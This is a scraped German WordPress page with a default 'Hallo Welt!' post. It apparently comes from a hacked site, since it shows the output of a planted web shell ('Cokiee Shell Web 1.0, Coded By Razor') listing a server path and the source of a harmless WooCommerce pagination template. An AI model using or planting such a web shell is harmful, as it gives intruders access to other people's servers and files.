Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web284/html/wp-content/themes/splendor/woocommerce/loop/ |
Current File : //var/www/web284/html/wp-content/themes/splendor/woocommerce/loop/pagination.php |
<?php /** * Pagination - Show numbered pagination for catalog pages. * * @author WooThemes * @package WooCommerce/Templates * @version 2.0.0 */ if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly global $wp_query; if ( $wp_query->max_num_pages <= 1 ) return; ?> <hr style="margin-top:0px;"> <div class="pride_pg" style="margin-bottom:30px;"> <?php echo paginate_links( apply_filters( 'woocommerce_pagination_args', array( 'base' => str_replace( 999999999, '%#%', get_pagenum_link( 999999999 ) ), 'format' => '', 'current' => max( 1, get_query_var('paged') ), 'total' => $wp_query->max_num_pages, 'prev_text' => 'Previous', 'next_text' => 'Next', 'end_size' => 3, 'mid_size' => 3 ) ) ); ?> </div> <div class="clearfix"></div>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare